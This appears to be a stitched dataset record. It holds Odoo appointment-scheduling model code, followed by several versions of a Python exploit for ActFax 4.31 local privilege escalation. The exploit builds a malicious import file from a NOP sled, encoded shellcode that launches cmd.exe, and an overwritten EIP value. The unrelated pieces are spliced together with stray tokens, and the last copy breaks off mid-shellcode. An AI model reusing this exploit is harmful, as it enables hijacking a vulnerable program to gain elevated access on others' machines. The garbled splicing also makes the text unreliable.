fields.Selection(_tz_get, string='Timezone', required=\n True, default=lambda self: self.env.user.tz, help=\n 'Timezone where appointment take place')\n employee_ids = fields.Many2many('hr.employee',\n 'website_calendar_type_employee_rel', domain=[('user_id', '!=', \n False)], string='Employees')\n assignation_method = fields.Selection([('random', 'Random'), ('chosen',\n 'Chosen by the Customer')], string='Assignment Method', default=\n 'random', help=\n 'How employees will be assigned to meetings customers book on your website.'\n )\n appointment_count = fields.Integer('# Appointments', compute=\n '_compute_appointment_count')\n\n def _compute_appointment_count(self):\n meeting_data = self.env['calendar.event'].read_group([(\n 'appointment_type_id', 'in', self.ids)], ['appointment_type_id'\n ], ['appointment_type_id'])\n mapped_data = {m['appointment_type_id'][0]: m[\n 'appointment_type_id_count'] for m in meeting_data}\n for appointment_type in self:\n appointment_type.appointment_count = mapped_data.get(\n appointment_type.id, 0)\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id:\n appointment_type.website_url = '/calendar/%s/appointment' % (\n slug(appointment_type),)\n\n @api.returns('self', lambda value: value.id)\n def copy(self, default=None):\n default = default or {}\n default['name'] = self.name + _(' (copy)')\n return super(CalendarAppointmentType, self).copy(default=default)\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env['ir.actions.actions']._for_xml_id(\n 'calendar.action_calendar_event')\n action['context'] = {'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id}\n return action\n\n def _slots_generate(self, first_day, last_day, timezone):\n \"\"\" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)\n between first_day and last_day 
(datetimes in appointment timezone)\n\n :return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},\n ... ]\n \"\"\"\n\n def append_slot(day, slot):\n local_start = appt_tz.localize(datetime.combine(day, time(hour=\n int(slot.hour), minute=int(round(slot.hour % 1 * 60)))))\n local_end = appt_tz.localize(datetime.combine(day, time(hour=\n int(slot.hour), minute=int(round(slot.hour % 1 * 60)))) +\n relativedelta(hours=self.appointment_duration))\n slots.append({self.appointment_tz: (local_start, local_end),\n timezone: (local_start.astimezone(requested_tz), local_end.\n astimezone(requested_tz)), 'UTC': (local_start.astimezone(\n pytz.UTC).replace(tzinfo=None), local_end.astimezone(pytz.\n UTC).replace(tzinfo=None)), 'slot': slot})\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n slots = []\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==\n first_day.isoweekday()):\n if slot.hour > first_day.hour + first_day.minute / 60.0:\n append_slot(first_day.date(), slot)\n slot_weekday = [(int(weekday) - 1) for weekday in self.slot_ids.\n mapped('weekday')]\n for day in rrule.rrule(rrule.DAILY, dtstart=first_day.date() +\n timedelta(days=1), until=last_day.date(), byweekday=slot_weekday):\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==\n day.isoweekday()):\n append_slot(day, slot)\n return slots\n\n def _slots_available(self, slots, first_day, last_day, employee=None):\n \"\"\" Fills the slot stucture with an available employee\n\n :param slots: slots structure generated by _slots_generate\n :param first_day: start datetime in UTC\n :param last_day: end datetime in UTC\n :param employee: if set, only consider this employee\n if not set, consider all employees assigned to this appointment type\n \"\"\"\n\n def is_work_available(start_dt, end_dt, intervals):\n \"\"\" check if the slot is contained in the employee's work hours (defined by intervals)\n \"\"\"\n\n def find_start_index():\n 
\"\"\" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt\n \"\"\"\n\n def recursive_find_index(lower_bound, upper_bound):\n if upper_bound - lower_bound <= 1:\n if intervals[upper_bound][0] <= start_dt:\n return upper_bound\n return lower_bound\n index = (upper_bound + lower_bound) // 2\n if intervals[index][0] <= start_dt:\n return recursive_find_index(index, upper_bound)\n else:\n return recursive_find_index(lower_bound, index)\n if start_dt <= intervals[0][0] - tolerance:\n return -1\n if end_dt >= intervals[-1][1] + tolerance:\n return -1\n return recursive_find_index(0, len(intervals) - 1)\n if not intervals:\n return False\n tolerance = timedelta(minutes=1)\n start_index = find_start_index()\n if start_index != -1:\n for index in range(start_index, len(intervals)):\n if intervals[index][1] >= end_dt - tolerance:\n return True\n if len(intervals) == index + 1 or intervals[index + 1][0\n ] - intervals[index][1] > tolerance:\n return False\n return False\n\n def is_calendar_available(slot, events, employee):\n \"\"\" Returns True if the given slot doesn't collide with given events for the employee\n \"\"\"\n start_dt = slot['UTC'][0]\n end_dt = slot['UTC'][1]\n event_in_scope = lambda ev: fields.Date.to_date(ev.start\n ) <= fields.Date.to_date(end_dt) and fields.Date.to_date(ev\n .stop) >= fields.Date.to_date(start_dt)\n for ev in events.filtered(event_in_scope):\n if ev.allday:\n event_tz = pytz.timezone(ev.event_tz or employee.\n user_id.tz or self.env.user.tz or slot['slot'].\n appointment_type_id.appointment_tz or 'UTC')\n ev_start_dt = datetime.combine(fields.Date.from_string(\n ev.start_date), time.min)\n ev_stop_dt = datetime.combine(fields.Date.from_string(\n ev.stop_date), time.max)\n ev_start_dt = event_tz.localize(ev_start_dt).astimezone(\n pytz.UTC).replace(tzinfo=None)\n ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz\n .UTC).replace(tzinfo=None)\n if ev_start_dt < end_dt and ev_stop_dt 
> start_dt:\n return False\n elif fields.Datetime.to_datetime(ev.start\n ) < end_dt and fields.Datetime.to_datetime(ev.stop\n ) > start_dt:\n return False\n return True\n workhours = {}\n meetings = {}\n available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in\n employee or self.employee_ids]\n random.shuffle(available_employees)\n for slot in slots:\n for emp_pos, emp in enumerate(available_employees):\n if emp_pos not in workhours:\n workhours[emp_pos] = [(interval[0].astimezone(pytz.UTC)\n .replace(tzinfo=None), interval[1].astimezone(pytz.\n UTC).replace(tzinfo=None)) for interval in emp.\n resource_calendar_id._work_intervals_batch(\n first_day, last_day, resources=emp.resource_id)[emp\n .resource_id.id]]\n if is_work_available(slot['UTC'][0], slot['UTC'][1],\n workhours[emp_pos]):\n if emp_pos not in meetings:\n meetings[emp_pos] = self.env['calendar.event'].search([\n ('partner_ids.user_ids', '=', emp.user_id.id),\n ('start', '<', fields.Datetime.to_string(\n last_day.replace(hour=23, minute=59, second=59)\n )), ('stop', '>', fields.Datetime.to_string(\n first_day.replace(hour=0, minute=0, second=0)))])\n if is_calendar_available(slot, meetings[emp_pos], emp):\n slot['employee_id'] = emp\n break\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = 
self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n 
('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-5": "# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport calendar as cal\nimport random\nimport pytz\nfrom datetime import datetime, timedelta, time\nfrom dateutil import rrule\nfrom dateutil.relativedelta import relativedelta\nfrom babel.dates import format_datetime\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools.misc import get_lang\nfrom odoo.addons.base.models.res_partner import _tz_get\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom odoo.exceptions import ValidationError\n\n\nclass CalendarAppointmentType(models.Model):\n _name = \"calendar.appointment.type\"\n _description = \"Online Appointment Type\"\n _inherit = ['mail.thread', \"website.seo.metadata\", 'website.published.mixin']\n _order = \"sequence\"\n\n sequence = fields.Integer('Sequence')\n name = fields.Char('Appointment Type', required=True, translate=True)\n min_schedule_hours = fields.Float('Schedule before (hours)', required=True, default=1.0)\n max_schedule_days = fields.Integer('Schedule not after (days)', required=True, default=15)\n min_cancellation_hours = fields.Float('Cancel Before (hours)', required=True, default=1.0)\n appointment_duration = fields.Float('Appointment Duration', required=True, default=1.0)\n\n reminder_ids = fields.Many2many('calendar.alarm', string=\"Reminders\")\n location = fields.Char('Location', help=\"Location of the appointments\")\n message_confirmation = fields.Html('Confirmation Message', translate=True)\n message_intro = fields.Html('Introduction Message', translate=True)\n\n country_ids = fields.Many2many(\n 'res.country', 'website_calendar_type_country_rel', string='Restrict Countries',\n help=\"Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries\")\n question_ids = fields.One2many('calendar.appointment.question', 'appointment_type_id', string='Questions', copy=True)\n\n slot_ids = 
fields.One2many('calendar.appointment.slot', 'appointment_type_id', 'Availabilities', copy=True)\n appointment_tz = fields.Selection(\n _tz_get, string='Timezone', required=True, default=lambda self: self.env.user.tz,\n help=\"Timezone where appointment take place\")\n employee_ids = fields.Many2many('hr.employee', 'website_calendar_type_employee_rel', domain=[('user_id', '!=', False)], string='Employees')\n assignation_method = fields.Selection([\n ('random', 'Random'),\n ('chosen', 'Chosen by the Customer')], string='Assignment Method', default='random',\n help=\"How employees will be assigned to meetings customers book on your website.\")\n appointment_count = fields.Integer('# Appointments', compute='_compute_appointment_count')\n\n def _compute_appointment_count(self):\n meeting_data = self.env['calendar.event'].read_group([('appointment_type_id', 'in', self.ids)], ['appointment_type_id'], ['appointment_type_id'])\n mapped_data = {m['appointment_type_id'][0]: m['appointment_type_id_count'] for m in meeting_data}\n for appointment_type in self:\n appointment_type.appointment_count = mapped_data.get(appointment_type.id, 0)\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id :\n appointment_type.website_url = '/calendar/%s/appointment' % (slug(appointment_type),)\n\n @api.returns('self', lambda value: value.id)\n def copy(self, default=None):\n default = default or {}\n default['name'] = self.name + _(' (copy)')\n return super(CalendarAppointmentType, self).copy(default=default)\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env[\"ir.actions.actions\"]._for_xml_id(\"calendar.action_calendar_event\")\n action['context'] = {\n 'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id\n }\n return action\n\n # --------------------------------------\n # Slots Generation\n # 
--------------------------------------\n\n def _slots_generate(self, first_day, last_day, timezone):\n \"\"\" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)\n between first_day and last_day (datetimes in appointment timezone)\n\n :return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},\n ... ]\n \"\"\"\n def append_slot(day, slot):\n local_start = appt_tz.localize(datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))))\n local_end = appt_tz.localize(\n datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))) + relativedelta(hours=self.appointment_duration))\n slots.append({\n self.appointment_tz: (\n local_start,\n local_end,\n ),\n timezone: (\n local_start.astimezone(requested_tz),\n local_end.astimezone(requested_tz),\n ),\n 'UTC': (\n local_start.astimezone(pytz.UTC).replace(tzinfo=None),\n local_end.astimezone(pytz.UTC).replace(tzinfo=None),\n ),\n 'slot': slot,\n })\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n\n slots = []\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == first_day.isoweekday()):\n if slot.hour > first_day.hour + first_day.minute / 60.0:\n append_slot(first_day.date(), slot)\n slot_weekday = [int(weekday) - 1 for weekday in self.slot_ids.mapped('weekday')]\n for day in rrule.rrule(rrule.DAILY,\n dtstart=first_day.date() + timedelta(days=1),\n until=last_day.date(),\n byweekday=slot_weekday):\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == day.isoweekday()):\n append_slot(day, slot)\n return slots\n\n def _slots_available(self, slots, first_day, last_day, employee=None):\n \"\"\" Fills the slot stucture with an available employee\n\n :param slots: slots structure generated by _slots_generate\n :param first_day: start datetime in UTC\n :param last_day: end datetime in UTC\n :param employee: if set, only consider this employee\n if 
not set, consider all employees assigned to this appointment type\n \"\"\"\n\n def is_work_available(start_dt, end_dt, intervals):\n \"\"\" check if the slot is contained in the employee's work hours (defined by intervals)\n \"\"\"\n def find_start_index():\n \"\"\" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt\n \"\"\"\n def recursive_find_index(lower_bound, upper_bound):\n if upper_bound - lower_bound <= 1:\n if intervals[upper_bound][0] <= start_dt:\n return upper_bound\n return lower_bound\n index = (upper_bound + lower_bound) // 2\n if intervals[index][0] <= start_dt:\n return recursive_find_index(index, upper_bound)\n else:\n return recursive_find_index(lower_bound, index)\n\n if start_dt <= intervals[0][0] - tolerance:\n return -1\n if end_dt >= intervals[-1][1] + tolerance:\n return -1\n return recursive_find_index(0, len(intervals) - 1)\n\n if not intervals:\n return False\n\n tolerance = timedelta(minutes=1)\n start_index = find_start_index()\n if start_index != -1:\n for index in range(start_index, len(intervals)):\n if intervals[index][1] >= end_dt - tolerance:\n return True\n if len(intervals) == index + 1 or intervals[index + 1][0] - intervals[index][1] > tolerance:\n return False\n return False\n\n def is_calendar_available(slot, events, employee):\n \"\"\" Returns True if the given slot doesn't collide with given events for the employee\n \"\"\"\n start_dt = slot['UTC'][0]\n end_dt = slot['UTC'][1]\n\n event_in_scope = lambda ev: (\n fields.Date.to_date(ev.start) <= fields.Date.to_date(end_dt)\n and fields.Date.to_date(ev.stop) >= fields.Date.to_date(start_dt)\n )\n\n for ev in events.filtered(event_in_scope):\n if ev.allday:\n # allday events are considered to take the whole day in the related employee's timezone\n event_tz = pytz.timezone(ev.event_tz or employee.user_id.tz or self.env.user.tz or slot['slot'].appointment_type_id.appointment_tz or 'UTC')\n ev_start_dt = 
datetime.combine(fields.Date.from_string(ev.start_date), time.min)\n ev_stop_dt = datetime.combine(fields.Date.from_string(ev.stop_date), time.max)\n ev_start_dt = event_tz.localize(ev_start_dt).astimezone(pytz.UTC).replace(tzinfo=None)\n ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz.UTC).replace(tzinfo=None)\n if ev_start_dt < end_dt and ev_stop_dt > start_dt:\n return False\n elif fields.Datetime.to_datetime(ev.start) < end_dt and fields.Datetime.to_datetime(ev.stop) > start_dt:\n return False\n return True\n\n workhours = {}\n meetings = {}\n\n # With context will be used in resource.calendar to force the referential user\n # for work interval computing to the *user linked to the employee*\n available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in (employee or self.employee_ids)]\n random.shuffle(available_employees)\n for slot in slots:\n for emp_pos, emp in enumerate(available_employees):\n if emp_pos not in workhours:\n workhours[emp_pos] = [\n (interval[0].astimezone(pytz.UTC).replace(tzinfo=None),\n interval[1].astimezone(pytz.UTC).replace(tzinfo=None))\n for interval in emp.resource_calendar_id._work_intervals_batch(\n first_day, last_day, resources=emp.resource_id,\n )[emp.resource_id.id]\n ]\n\n if is_work_available(slot['UTC'][0], slot['UTC'][1], workhours[emp_pos]):\n if emp_pos not in meetings:\n # note: no check is made on the attendee's status (accepted/declined/...)\n meetings[emp_pos] = self.env['calendar.event'].search([\n ('partner_ids.user_ids', '=', emp.user_id.id),\n ('start', '<', fields.Datetime.to_string(last_day.replace(hour=23, minute=59, second=59))),\n ('stop', '>', fields.Datetime.to_string(first_day.replace(hour=0, minute=0, second=0)))\n ])\n\n if is_calendar_available(slot, meetings[emp_pos], emp):\n slot['employee_id'] = emp\n break\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' 
or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(days=self.max_schedule_days))\n\n # Compute available slots (ordered)\n slots = self._slots_generate(first_day.astimezone(appt_tz), last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC), last_day.astimezone(pytz.UTC), employee)\n\n # Compute calendar rendering and inject available slots\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n # slots are ordered, so check all unprocessed slots from until > day\n while slots and (slots[0][timezone][0].date() <= day):\n if (slots[0][timezone][0].date() == day) and ('employee_id' in slots[0]):\n today_slots.append({\n 'employee_id': slots[0]['employee_id'].id,\n 'datetime': slots[0][timezone][0].strftime('%Y-%m-%d %H:%M:%S'),\n 'hours': slots[0][timezone][0].strftime('%H:%M')\n })\n slots.pop(0)\n dates[week_index][day_index] = 
{\n 'day': day,\n 'slots': today_slots,\n 'mute_cls': mute_cls,\n 'weekend_cls': weekend_cls,\n 'today_cls': today_cls\n }\n\n months.append({\n 'month': format_datetime(start, 'MMMM Y', locale=get_lang(self.env).code),\n 'weeks': dates\n })\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = \"calendar.appointment.slot\"\n _description = \"Online Appointment : Time Slot\"\n _rec_name = \"weekday\"\n _order = \"weekday, hour\"\n\n appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([\n ('1', 'Monday'),\n ('2', 'Tuesday'),\n ('3', 'Wednesday'),\n ('4', 'Thursday'),\n ('5', 'Friday'),\n ('6', 'Saturday'),\n ('7', 'Sunday'),\n ], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.00 or slot.hour >= 24.00 for slot in self):\n raise ValidationError(_(\"Please enter a valid hour between 0:00 and 24:00 for your slots.\"))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, \"%s, %02d:%02d\" % (weekdays.get(slot.weekday), int(slot.hour), int(round((slot.hour % 1) * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = \"calendar.appointment.question\"\n _description = \"Online Appointment : Questions\"\n _order = \"sequence\"\n\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete=\"cascade\")\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([\n ('char', 'Single line text'),\n ('text', 'Multi-line text'),\n ('select', 'Dropdown (one answer)'),\n ('radio', 'Radio (one 
answer)'),\n ('checkbox', 'Checkboxes (multiple answers)')], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer', 'calendar_appointment_question_answer_rel', 'question_id', 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = \"calendar.appointment.answer\"\n _description = \"Online Appointment : Answers\"\n\n question_id = fields.Many2many('calendar.appointment.question', 'calendar_appointment_question_answer_rel', 'answer_id', 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-ids": [
7,
10,
12,
18,
19
]
}
|
[
7,
10,
12,
18,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
<|reserved_special_token_1|>
sc = (
'\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'
)
frontpad = '\x90' * 10
eip = '"\x1b@\x00'
backpad = '\x90' * 6000
buff = frontpad + sc + '\x90' * (502 - len(sc)) + eip + backpad
f = open('pwnag3.exp', 'w')
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
<|reserved_special_token_1|>
#!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html
#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
# Payload: msfpayload windows/exec CMD=cmd.exe, encoded x86/alpha_upper,
# 466 bytes (see header comments above).
sc = (
"\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a"
"\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a"
"\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c"
"\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34"
"\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b"
"\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43"
"\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58"
"\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52"
"\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47"
"\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e"
"\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51"
"\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56"
"\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f"
"\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50"
"\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47"
"\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30"
"\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30"
"\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54"
"\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36"
"\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b"
"\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a"
"\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f"
"\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c"
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e"
"\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d"
"\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35"
"\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e"
